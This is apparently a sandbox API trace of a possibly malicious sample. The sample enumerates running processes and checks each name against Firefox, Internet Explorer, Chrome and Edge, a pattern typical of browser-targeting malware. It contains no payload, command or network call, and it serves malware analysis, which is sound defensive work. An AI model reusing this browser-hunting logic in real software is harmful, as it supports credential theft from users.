[0201.080] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0201.080] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0201.080] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0201.080] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0201.080] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0201.080] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0201.081] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0201.081] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0201.081] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0201.081] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0201.081] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0201.081] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0201.081] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0201.081] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0201.081] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0201.081] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0201.082] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0201.082] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0201.082] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0201.082] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0201.082] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0201.082] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0201.082] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0201.083] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0201.083] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0201.083] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0201.083] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0201.083] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0201.083] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0201.083] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0201.083] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0201.084] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0201.084] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0201.084] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0201.084] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0201.084] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0201.084] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0201.084] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0201.084] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0201.084] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0201.084] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0201.085] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0201.085] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0201.085] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0201.085] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0201.085] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0201.085] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0201.085] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0201.085] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0201.085] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0201.085] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.086] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0201.086] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0201.086] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0201.086] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0201.086] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.086] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0201.086] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0201.087] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0201.087] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0201.087] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.087] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0201.087] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0201.087] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0201.087] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0201.087] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.088] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0201.088] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0201.088] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0201.088] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0201.088] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.088] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0201.088] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0201.088] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0201.088] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0201.088] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0201.089] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0201.089] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0201.089] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0201.089] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0201.089] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.089] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0201.089] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0201.089] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0201.089] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0201.089] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.090] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0201.090] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0201.090] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0201.090] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0201.090] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0201.091] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0201.091] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0201.091] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0201.091] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0201.091] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0201.091] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0201.091] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0201.091] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0201.091] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0201.091] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0201.092] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0201.092] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0201.092] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0201.092] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0201.092] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.092] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0201.092] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0201.092] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0201.092] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0201.092] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0201.093] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0201.093] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0201.093] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0201.093] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0201.093] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0201.093] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0201.094] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0201.094] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0201.094] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0201.094] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0201.094] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0201.094] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0201.094] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0201.094] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0201.094] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0201.095] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0201.095] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0201.095] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0201.095] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0201.095] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0201.095] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0201.095] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0201.095] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0201.095] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0201.095] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0201.096] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0201.096] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0201.096] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0201.096] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0201.096] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0201.096] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0201.096] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0201.096] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0201.096] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0201.096] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0201.097] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0201.097] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0201.097] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0201.097] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0201.097] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0201.098] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0201.098] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0201.098] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0201.098] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0201.098] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0201.098] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0201.098] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0201.098] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0201.098] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0201.098] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0201.099] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0201.099] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0201.099] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0201.099] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0201.099] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0201.099] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0201.099] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0201.099] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0201.099] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0201.099] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0201.100] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0201.100] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0201.100] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0201.100] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0201.100] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0201.100] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0201.100] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0201.100] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0201.100] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0201.101] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0201.101] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0201.101] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0201.101] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0201.101] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0201.101] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0201.102] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0201.102] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0201.102] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0201.102] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0201.102] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0201.102] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0201.102] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0201.102] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0201.102] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0201.102] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0201.103] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0201.103] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0201.103] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0201.103] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0201.103] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0201.103] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0201.103] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0201.103] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 